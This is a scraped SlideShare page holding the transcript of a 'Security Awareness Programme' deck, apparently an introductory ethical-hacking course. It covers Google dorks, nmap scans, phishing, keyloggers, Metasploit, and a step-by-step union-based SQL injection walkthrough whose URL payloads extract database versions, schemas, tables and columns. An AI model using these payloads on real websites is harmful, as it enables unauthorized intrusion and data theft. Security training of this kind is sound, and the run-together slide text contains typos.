Your SlideShare is downloading. ×
0
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Security Awareness Programme
Upcoming SlideShare
Loading in...5
×

Thanks for flagging this SlideShare!

Oops! An error has occurred.

×
Saving this for later? Get the SlideShare app to save on your phone or tablet. Read anywhere, anytime – even offline.
Text the download link to your phone
Standard text messaging rates apply

Security Awareness Programme

1,475

Published on

Security Awareness Programme

Security Awareness Programme

Published in: Technology, News & Politics
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,475
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
0
Comments
0
Likes
0
Embeds 0
No embeds

Report content
Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
No notes for slide

Transcript

  • 1. Introduction to HackingHacking is the art of manipulating things suchthat it works the way ; it wasn’t supposed todo.So, the term ‘Hacking’ is not only confined tothe world of computers only.EX : Opening the car window using a ruler
  • 2. Who am I ?Hacker is a person who loves to explore thetechnology and takes it to next level.According to some stereotypes, Hackingtoday refers to breaking in computer systemwithout authorization, which is a criminaloffense as per law.The person who uses their hacking skills formalicious purpose is called cracker .
  • 3. Types of HackerWhite Hat | Grey Hat | Black Hat
  • 4. Technical Level of HackersNeophyte – A Newbie in the field ofComputer Security with almost noknowledge.Script Kiddie – A non-expert who usesTools or Scripts made by other Hackersinto System with little knowledge aboutthe concept working behind the tool.Elite – Also known as 1337, it is a termused to describe the most technicallyadvanced hackers who use cutting edgetechnology.
  • 5. IS HACKING LEGAL?Yes, Hacking is legal, if you are authorized forthe same i.e hired to find Vulnerabilities.This is the job of an ETHICAL HACKEREthical Hacker is a person who uses theirhacking skills for finding security loop holes orvulnerabilities in hiring TARGET system andreports the flaws to administrator of thecompany.
  • 6. Security TriangleDefines Balance between Security , Functionality and Ease of useAs security increases, the system’s functionality and ease of use decreases .
  • 7. Internet Protocol
  • 8. Class of IP AddressNOTE : NID – Network ID , HID – Host ID
  • 9. Ports and Services• FTP 21• SSH 22• TELNET 23• SMTP 25• WWW 80• SSL 443• ORACLE TNS Listener 1521
  • 10. STEPS OF MALICIOUS HACKING
  • 11. STEPS OF ETHICAL HACKING1.Informationgathering2. Scanning3. GainingAccess4. GeneratingReport5. Reportvunerability
  • 12. Footprinting• Process of creating a blueprint or map of anorganization’s network and systems.• Or It is a technique of gathering informationform various Sources.• Generally, a hacker spends 90percent of the time profilingand gathering information ona target and 10 percent of thetime launching the attack.
  • 13. Sources of Information• Media – TV , News etc• Social Network – facebook, Twitter, Google+• Search Engine – Google, Yahoo, Bing• People Search – Yahoo! People, 123people.cometc.• Domain name Lookups – Whois, SamSpade,Nslookup, Domain name lookup, DnsStuff• Network Range - ARIN, IANA,• Geographic Map – Traceroute, NeoTrace,VisualRoute• “Every single bit of information can useful”
  • 14. Sources of InformationOnline Lookups• Whois , ARIN , Centralops, SamSpade• DNSstuff, Visual Trace, NeoTraceSocial Network + People Search• Facebook, Google + , Twitter• Yahoo! People, 123peopleSearch Engines, News Groups• Google news, iGoogle• Google, Yahoo, Bing, Ask
  • 15. Scanning• Nmap –A 192.168.56.1/24• Nmap –O 192.168.56.101
  • 16. Woooohh……firewall !!
  • 17. What is firewall?Firewalls are software program or hardwaredevices that works as a filter between yourcomputer (or network) and internet dependingupon a set of rules.It is similar to security guard at entrance whoprevents intruders to enter the houseand also prevents convicts fromescaping out.Firewalls are of two types:1. Software firewalls 2. Hardware firewalls
  • 18. Software firewalls• Used by individual home users• Installed on your computer as an application software.• Runs in background and monitors the network activity.• Ex: windows firewall, Black ice defender, kaspersky internetsecurity, AVG internet security etc.•
  • 19. • It is a device that guards the entrance to a network, not anindividual computer.• Basically, installed between your broadbandcable or DSL modem and your computers.• Provides higher level of security than software firewalls.Hardware firewall
  • 20. How firewall works : outbound
  • 21. How firewall works: Inbound
  • 22. What is DNS?• DNS stands for Domain Name Server.• It was difficult to remember ip address for eachwebsites, so it came into action.• It maintains table that contains domian names vs ipaddress columns in its database.• Used for translating domain names into theirrespective ip address.• Ex : facebook.com = 66.220.158.11• Stores frequently used domains in its cache.• Ex : Google’s open DNS server : 4.2.2.2
  • 23. How DNS servers work?
  • 24. Google HackingFounders of Google:Sergey Brin and Larry Page“Google Hacking” doesn’t mean“How to hack Google? ”.It is skill to extract valuableinformation from web with thehelp of special keywords called“GOOGLE DORKS”Main idea is to “Pick a vulnerability, find the site”.
  • 25. How Google works?• Google Bots : Bots are computer program that automaticallybrowse the world wide web in some order. These are also calledweb crawlers, spiders, ants or robots. Google uses mainly two bots : Crawlers : It traverses over the web following the links found ondifferent pages. When it finds any new page, sends its link to spider. Spiders : It is a robotic browser like program that downloads the webpages associated with the link send by crawlers.• Indexer : It dissects and sorts each word, images etc on the everyweb page downloaded by spiders.• The Database is a warehouse for storing the pages downloaded andprocessed.• Search Engine Results : Depending upon search keywords, it digssearch results out of the database following an algorithm.
  • 26. Google : Server sideGoogle botsCrawler finds new pages via• URL submission at http://google.com/addurl.html• Following different links present on each webpage.Spiders download these webpages on google servers
  • 27. Google : Client Side
  • 28. Basics of Google Hacking+ Forces the word to be searched +firefox , will bring up results thatcontains the word firefox.- Eliminates the word from search results -chrome, will bring up results thatdoesn’t contains word chrome“ ” delimiters for entire search phrases(not single words)“Internet Explorer" will returndocuments containing the phraseInternet Explorer. Single letter wildcard Krazzy.hack will search for words likekrazzy@hack, krazzy2hack, krazzy-hack, krazzy_hack etc.* Single word wildcard hack * planet will search for wordslike hack the planet, hack for planet,hack all planet etc.| logical OR firefox|chrome will returndocuments containing either firefoxor chrome but not both.
  • 29. Google query : keywords - Isite Restricts the search within thespecified domain.site:xyz.com will show all pages onxyz.com crawled by Google botsintitle restricts results to documents whosetitle contains the specified wordintitle:fox fire will find all sites withthe word fox in thetitle and fire in the textallintitle restricts results to documents whosetitle contains all the specifiedphrasesallintitle:fox fire will find all sites withthe words fox and fire in the title, soits equivalent to intitle:fox intitle:fireinurl restricts the results to sites whoseURL contains specified wordinurl:hacker will find sites whose urlcontain word hacker.allinurl restricts results to sites whose URLcontains all the specified phrasesallinurl:hacker vs cracker will find thesites whose url contains hacker vscrackerfiletype Filters search to specified filetypes filetype:pdf Google hacking willshow all the pdf documentscontaining word Google hacking
  • 30. Google query : keywords -IIlink restricts results to sitescontaining links to the specifiedlocationlink:www.google.com will returndocuments containing one or morelinks to www.google.cominanchor restricts results to sitescontaining anchored text withthe specified wordinanchor: backtrack will returndocuments that has fire as anchoredtext (not url)allintext restricts results to documentscontaining the specified phrasein the text only.allintext:“kevin Mitnik" will returndocuments which contain the phrasekevin Mitnik in their text onlynumrange restricts results to documentscontaining a number from thespecified Rangenumrange:1-100 fire will return sitescontaining a number from 1 to 100 andthe word fire. The same result can beachieved with 1..100 firecache Shows cache version of URL cache:xyz.com will show how the sitelooked , the last time Google botsvisited the site.
  • 31. Advanced Google Dorks• Inurl:view/index.shtml• Inurl:view/view.shtml
  • 32. System HackingWhere windows installs passwordReset windows logon passwordPlay with sticky keysOPHCRACKMake a folder System HiddenEnable/Disable USB devicesMake Drives invisibleMake a undeletable folderTrojans
  • 33. Email Hacking
  • 34. Email HackingHow to Trace sender of emailCheck if sender has opened your mailGet ip address of your friend on chatSecret Question….Phishing – Yeah I got A fish ;-)Keyloggers – what the heck??
  • 35. PhishingAttacker convinces the victim to put their details on a fake pageWhen Attacker enters their credentials on the form is stored on another log fileAnd Victim is redirected to Original site.
  • 36. Software keyloggers
  • 37. Key loggers
  • 38. Hardware keylogger
  • 39. Connect the keylogger
  • 40. Identify a keylogger
  • 41. Hardware keyloggers
  • 42. Website Hacking
  • 43. OSWAP Report
  • 44. SQL Injection
  • 45. SQL Injection• What is Database?- Collection of logically related data- It is similar to Attendance register• Define Table ?- It combination of rows and columns• What is SQL ?- SQL stands for Structured Query Language.- Used to select the information from database
  • 46. Basic SQL queriesCreate a table• Create table users(name varchar2(30), email varchar(50),password varchar(30), address varchar2(100));Extracting data from table• Select name, email, password from users;• Select * from users where email=‘xyz@abc.com’ ANDpassword=‘s3cr3t’;• Select * from users order by name;
  • 47. Basics of SQL Injection• How to find a site that is vulnerable to sqlinjection attack?- Use Google dorks- Inurl:view_faculty.php?id=- Inurl:viz.php?id=- Inurl:list.php?id=- Use Vunerability scanner- Acutenix- W3af
  • 48. What happens in background??• Check if site is vulnerable or not?- Ex : http://xyz.com/list.php?id=3Select name, email, password from users whereid =3;- Ex : http://xyz.com/list.php?id=3’Select name, email, password from users whereid =3’;THIS WILL GIVE AN ERROR MESSAGE, MEANS WECAN DIRECTLY COMMUICATE WITH DATABASE !!
  • 49. So WHAT’s NEXT???• We will try to find no of columns in the Tablehttp://xyz.com/list.php?id=3+order+by+1-- Select name, email, password from users where id =3order by 1--- It will extract name, email, passowrd from users tableand sort the contents by 1st column; So it will give youfresh original webpage. Select name, email, password from users where id =3order by 100—- It will extract name, email, passowrd from users table andsort the contents by 100th column; There isn’t any 100thcolumn so it will give you error.
  • 50. Finding columns• So , we will increment ‘order by value by 1’untill we get errorhttp://xyz.com/list.php?id=3+order+by+1--http://xyz.com/list.php?id=3+order+by+2--http://xyz.com/list.php?id=3+order+by+3--::http://xyz.com/list.php?id=3+order+by+7--The above query returns error , means there are6 columns current table.
  • 51. Find the Vulnerable column• We select all the columns i.e from 1-6http://xyz.com/list.php?id=3+union+all+select+1,2,3,4,5,6--• Try to find the vulnerable column that willretuurn datahttp://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--IT WILL RETURN THE NOS OF VULNERABLECOLUMN i.e 1,2,3,4,5 or 6.
  • 52. SQLi cont..• Suppose it returns 2 and 6http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,6--• Then we can fetch any information in database atthese column noshttp://xyz.com/list.php?id=-3+union+all+select+1,@@version,3,4,5,database()--This will return the version of database and name of database.SYSTEM VARIABLES@@version : Returns Version of database@@user : Returns the user Currently logged in@@database : Returns the name of database
  • 53. Information Schema• Most of the websites use Mysql Databases forstoring their information.• MySQl has ‘INFORMATION_SCHEMA’ databasewhich keeps record of all the schemas , tables andColumns in the server.• INFORMATION_SCHEMA.SCHEMATA storesshema details.• INFORMATION_SCHEMA.TABLES stores all theinformation regarding tables in the database.• INFORMATION_SCHEMA.COLUMNS storesinformation of all the columns in all the tables.
  • 54. SQLi Cont…• The below query will extract all the database inthe current server.http://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_concat(schema_name) from information_schema.schemata—• Below code will extract all the tables in currentdbhttp://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_conact(table_name) from information_schema.tables—
  • 55. SQLi Cont…• Extract all the Columns from the current tablehttp://xyz.com/list.php?id=-3+union+all+select+1,2,3,4,5,group_conact(column_name) from information_schema.columnswhere table_name=‘users’—• Extract all the
  • 56. Metasploit Framework• It is a framework to exploit the services foundduring Scanning Phase• You can create virus infected files .. Using thisframework within a couple of minutes• After Breaking into the system, You can setbackdoor, download files , upload files, disablemouse, disable keyboard…and lots more• We have provided a detailed full length HDvideo tutorial in the DVD and a ebook
  • 57. Metasploit – The Pentesters Guide
  • 58. Social Engineering Toolkit
  • 59. Social Enginnering on Clients
  • 60. Social Engineer Toolkit
  • 61. THANKS FOR TOLERATING US

×